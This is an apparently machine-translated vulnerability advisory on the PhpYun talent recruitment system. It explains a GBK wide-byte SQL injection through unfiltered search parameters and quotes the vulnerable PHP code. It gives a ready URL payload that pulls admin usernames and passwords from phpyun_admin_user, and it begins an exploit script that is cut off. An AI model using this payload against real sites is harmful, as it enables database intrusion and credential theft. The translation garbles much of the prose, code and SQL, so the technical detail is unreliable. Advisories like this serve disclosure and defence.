PhpYun talent system through the kill injection and code execution vulnerabilities-vulnerability warning-the black bar safety net

ID MYHACK58:62201027945
Type myhack58
Reporter 佚名
Modified 2010-09-27T00:00:00


PhpYun talent system is php the industry the door of households website php100 heavy launch a set of open source talent system, because of php100 position in the industry and the rapid is the webmasters choice, but after all is a new thing, which is code in the security on the presence of serious security issues. 1. Width byte injection

Vulnerability description

The system in config/db. safety. php defined in the following code:

function quotesGPC() { $_POST = array_map("addSlash", $_POST); $_GET = array_map("addSlash", $_GET); $_COOKIE = array_map("addSlash", $_COOKIE); } function addSlash($el) { if (is_array($el)) return array_map("addSlash", $el); else return addslashes($el); }

This section of code forces the variable to the gpc conversion, in order to increase security, but it is puzzling that this section of code is simply not in the system call, causing the php in the gpc to close the case, can be directly to the system for injection. Due to the General php the gpc is turned on by default, all query variables within the sql statement in single quotes surrounded by, and the inti-type variable for the cast, so slightly seemed a bit tasteless.

But since the entire system uses gbk encoding, but not doing the corresponding character filtered, in most places resulting in a wide byte injection.

The following code:

if(isset($_GET[search])){ .... Omitted parts irrelevant code //company type $where=! empty($_GET[exp])? "and a.exp='$_GET[exp]' ":null; //type of company $where.=! empty($_GET[edu])? "and'$_GET[edu]' ":null; //degree $where.=! empty($_GET[salary])? "and a.salary='$_GET[salary]' ":null; //monthly salary $where.=$ _GET[keyword]!=" The keyword"? "and like '%$_GET[keyword]%' ":null; //keywords ..... Omitted parts unrelated to the code $select=",a.uid, as jobname,a.number,,a.provinceid as jobcity,a.lastupdate,a.salary,a.description,,,b.mun";

$searchsql=$obj->DB_select_alls("company_job","company","1 $where order by lastupdate desc limit $firstcount,$displaypg",$select)

Variable without any validation that is brought into the query statement, in the gpc open the case with the%df'as the keywords of the query to close the sql Query of single quotes to achieve the injection, the burst account number and password.

Use way:

Carefully constructed injection statement,2,concat(0x40,0x23,username,0x7e,password,0x23,0x40),4,5,6,7,8,9,0,1 1,1 2%20from%20phpyun_admin_user--%20sdfsd&provinceid=&mySearchCityName=&mySearchCity=&search=%CB%D1%CB%F7,

Can be injected out of the background account and password.

Attach exp:

<? php / Php Yun talent system wide byte code injection exp **/ print_r(' +--------------------------------------------------------------------+ PhpYun RenCai System Remove SQL Injection Exploit By l4yn3 Blog +--------------------------------------------------------------------+ ');

[1] [2] [3] next